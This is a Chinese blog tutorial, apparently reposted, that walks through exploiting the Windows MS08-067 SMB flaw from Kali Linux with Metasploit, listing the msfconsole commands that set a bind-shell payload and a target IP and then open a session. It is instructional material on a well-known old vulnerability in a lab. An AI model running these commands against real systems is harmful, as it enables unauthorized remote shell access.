zoukankan      html  css  js  c++  java
  • Kali linux 2016.2(Rolling)的利用MSF攻击windows小案例(exploits + payloads + taegets)(博主推荐)

     不多说,直接上干货!

       本博文举的例,是利用远程溢出windows服务器。

       Exploit/windows/smb/ms08_067_netapi。

       Payload :    windows/shell/bind_tcp

      Target:  windows 2000

      

      以下是受害者机器情况。

     

     

       以下是攻击者机器

       这是show  exploits

       use   exploit/windows/smb/ms08_067_netapi

       以下是show payloads

       set  PAYLOAD   windows/shell/bind_tcp

       set   RHOSt    192.168.0.15

       show  targets

        如果将targets什么都不设置,或者设置为0的话,它就是自动探测。

     

       即,此刻,就是已经成功攻下了受害者机器。

      然后,做我们想要做的事情了。

       它会将我们从攻击者到受害者机器,的这一过程建议一个会话。在后台。

        通过session来查看。

      通过session -h来查看session命令的使用。

      

      一般用session -i  编号来切入到会话。

     

      总结  exploits + payloads + taegets

    1、连接到远程系统的漏洞端口

    2、交换协议序列直到到达漏洞触发点

    3、注入利用代码,其中包含了直接或间接的修改

      返回地址为我们payload的指令以及nop指令,这增加了我们的代码被执行的机会。

    4、 后续利用,可以是在受害主机上绑定任意端口的命令提示符或一个已经被创建的用户连接到远程系统或可能是一个GUI客户端连接到远程系统

  • 相关阅读:
    ASP.NET中自定义控件无法响应事件的问题
    通过编程为ASP.NET页面设置缓存
    VB.NET中Module的概念
    IDENTITY列及其编号的问题
    使用XML RPC进行远程调用
    存储过程编写和优化的经验
    为控件添加设计期支持
    SSIS的一个问题
    多线程编程中的锁定(lock,Monitor)
    汉字的奥秘: 获取汉字的笔画数
  • 原文地址:https://www.cnblogs.com/zlslch/p/6891406.html
Copyright © 2011-2022 走看看